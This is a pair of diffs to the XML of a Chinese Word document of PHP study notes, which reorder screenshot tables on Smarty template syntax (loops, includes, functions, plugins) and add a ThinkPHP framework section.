--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -39,9 +39,9 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="6407"/>
-        <w:gridCol w:w="6456"/>
-        <w:gridCol w:w="6456"/>
+        <w:gridCol w:w="6437"/>
+        <w:gridCol w:w="6441"/>
+        <w:gridCol w:w="6441"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -1389,11 +1389,6 @@
             <w:tcW w:w="6441" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -1485,11 +1480,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -1623,11 +1613,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -1739,15 +1724,7 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1756,7 +1733,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
             </w:pPr>
@@ -1764,7 +1740,179 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ThinkPHP</w:t>
+      </w:r>
+      <w:r>
+        <w:t>框架</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6437"/>
+        <w:gridCol w:w="6441"/>
+        <w:gridCol w:w="6441"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6437" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359F88DA" wp14:editId="53E4E31E">
+                  <wp:extent cx="3950335" cy="1972310"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+                  <wp:docPr id="10" name="图片 10"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId16"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3950335" cy="1972310"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>ThinkPHP</w:t>
+            </w:r>
+            <w:r>
+              <w:t>框架：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735B93BA" wp14:editId="26E42907">
+                  <wp:extent cx="3950335" cy="722630"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+                  <wp:docPr id="11" name="图片 11"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId17"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3950335" cy="722630"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="0"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>

--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -866,7 +866,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId4"/>
+                          <a:blip r:embed="rId5"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -897,72 +897,6 @@
                   <wp:extent cx="3962400" cy="1501140"/>
                   <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                   <wp:docPr id="2" name="图片 2"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId5"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3962400" cy="1501140"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6441" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>if</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>语句</w:t>
-            </w:r>
-            <w:r>
-              <w:t>：</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281A09E9" wp14:editId="04535828">
-                  <wp:extent cx="3945255" cy="1659890"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="3" name="图片 3"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -982,7 +916,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3945255" cy="1659890"/>
+                            <a:ext cx="3962400" cy="1501140"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -995,23 +929,22 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>selection</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>循环</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>if</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
               <w:t>语句</w:t>
@@ -1026,10 +959,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B2992CA" wp14:editId="4A9DB9EC">
-                  <wp:extent cx="3105150" cy="1209675"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-                  <wp:docPr id="4" name="图片 4"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281A09E9" wp14:editId="04535828">
+                  <wp:extent cx="3945255" cy="1659890"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="3" name="图片 3"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1049,7 +982,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3105150" cy="1209675"/>
+                            <a:ext cx="3945255" cy="1659890"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -1065,13 +998,38 @@
           <w:p>
             <w:r>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>selection</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>循环</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>语句</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057ADD93" wp14:editId="6581A3EF">
-                  <wp:extent cx="3952875" cy="1166495"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
-                  <wp:docPr id="5" name="图片 5"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B2992CA" wp14:editId="4A9DB9EC">
+                  <wp:extent cx="3105150" cy="1209675"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                  <wp:docPr id="4" name="图片 4"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1091,7 +1049,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3952875" cy="1166495"/>
+                            <a:ext cx="3105150" cy="1209675"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -1104,54 +1062,16 @@
               </w:drawing>
             </w:r>
           </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6437" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>F</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>oreach</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>循环语句：</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D91D5F0" wp14:editId="0301FCBA">
-                  <wp:extent cx="2914650" cy="1600200"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="7" name="图片 7"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="057ADD93" wp14:editId="6581A3EF">
+                  <wp:extent cx="3952875" cy="1166495"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                  <wp:docPr id="5" name="图片 5"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1171,7 +1091,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2914650" cy="1600200"/>
+                            <a:ext cx="3952875" cy="1166495"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -1184,17 +1104,12 @@
               </w:drawing>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
         </w:tc>
+      </w:tr>
+      <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6441" w:type="dxa"/>
+            <w:tcW w:w="6437" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1206,20 +1121,20 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>S</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>marty</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>文件引用：</w:t>
+              <w:t>F</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>oreach</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>循环语句：</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1233,10 +1148,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D8AB4D2" wp14:editId="041FE51B">
-                  <wp:extent cx="3962400" cy="723900"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D91D5F0" wp14:editId="0301FCBA">
+                  <wp:extent cx="2914650" cy="1600200"/>
                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="8" name="图片 8"/>
+                  <wp:docPr id="7" name="图片 7"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1256,7 +1171,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3962400" cy="723900"/>
+                            <a:ext cx="2914650" cy="1600200"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -1275,6 +1190,18 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1292,7 +1219,7 @@
               <w:rPr>
                 <w:b/>
               </w:rPr>
-              <w:t>类的使用：</w:t>
+              <w:t>文件引用：</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1306,10 +1233,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9F2093" wp14:editId="2DB395DA">
-                  <wp:extent cx="3962400" cy="993140"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D8AB4D2" wp14:editId="041FE51B">
+                  <wp:extent cx="3962400" cy="723900"/>
                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="9" name="图片 9"/>
+                  <wp:docPr id="8" name="图片 8"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1329,7 +1256,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3962400" cy="993140"/>
+                            <a:ext cx="3962400" cy="723900"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -1343,92 +1270,46 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>模板</w:t>
-            </w:r>
-            <w:r>
-              <w:t>中</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>使用对象</w:t>
-            </w:r>
-            <w:r>
-              <w:t>名</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>-&gt;</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>方法名的</w:t>
-            </w:r>
-            <w:r>
-              <w:t>方式进行</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>调用</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6441" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>S</w:t>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
               <w:t>marty</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>函数</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>使用</w:t>
-            </w:r>
-            <w:r>
-              <w:t>：</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+                <w:b/>
+              </w:rPr>
+              <w:t>类的使用：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4312F277" wp14:editId="4D7376EC">
-                  <wp:extent cx="3962400" cy="861060"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C9F2093" wp14:editId="2DB395DA">
+                  <wp:extent cx="3962400" cy="993140"/>
                   <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="15" name="图片 15"/>
+                  <wp:docPr id="9" name="图片 9"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1448,7 +1329,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3962400" cy="861060"/>
+                            <a:ext cx="3962400" cy="993140"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -1465,15 +1346,74 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>Smarty</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>插件</w:t>
+              </w:rPr>
+              <w:t>模板</w:t>
+            </w:r>
+            <w:r>
+              <w:t>中</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>使用对象</w:t>
+            </w:r>
+            <w:r>
+              <w:t>名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>方法名的</w:t>
+            </w:r>
+            <w:r>
+              <w:t>方式进行</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>调用</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>marty</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>函数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>使用</w:t>
             </w:r>
             <w:r>
               <w:t>：</w:t>
@@ -1485,10 +1425,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F06575A" wp14:editId="213130D8">
-                  <wp:extent cx="3962400" cy="1614805"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
-                  <wp:docPr id="16" name="图片 16"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4312F277" wp14:editId="4D7376EC">
+                  <wp:extent cx="3962400" cy="861060"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="15" name="图片 15"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -1508,7 +1448,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3962400" cy="1614805"/>
+                            <a:ext cx="3962400" cy="861060"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -1521,96 +1461,23 @@
               </w:drawing>
             </w:r>
           </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6437" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>修饰</w:t>
-            </w:r>
-            <w:r>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>Smarty</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
               <w:t>插件</w:t>
             </w:r>
             <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
               <w:t>：</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>注册</w:t>
-            </w:r>
-            <w:r>
-              <w:t>时选择</w:t>
-            </w:r>
-            <w:r>
-              <w:t>modifier</w:t>
-            </w:r>
-            <w:r>
-              <w:t>，</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>与函数的区别是在模板中调用的格式不一样</w:t>
-            </w:r>
-            <w:r>
-              <w:t>，其他一致。</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>区块</w:t>
-            </w:r>
-            <w:r>
-              <w:t>函数插件：</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>调用</w:t>
-            </w:r>
-            <w:r>
-              <w:t>格式与函数相同，多了一个区块结束符，并且区块中的内容</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>也会作为</w:t>
-            </w:r>
-            <w:r>
-              <w:t>参数进入函数处理：</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:firstLineChars="150" w:firstLine="315"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>定义</w:t>
-            </w:r>
-            <w:r>
-              <w:t>：</w:t>
-            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -1618,10 +1485,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1630B436" wp14:editId="5966F0C3">
-                  <wp:extent cx="3931285" cy="2196465"/>
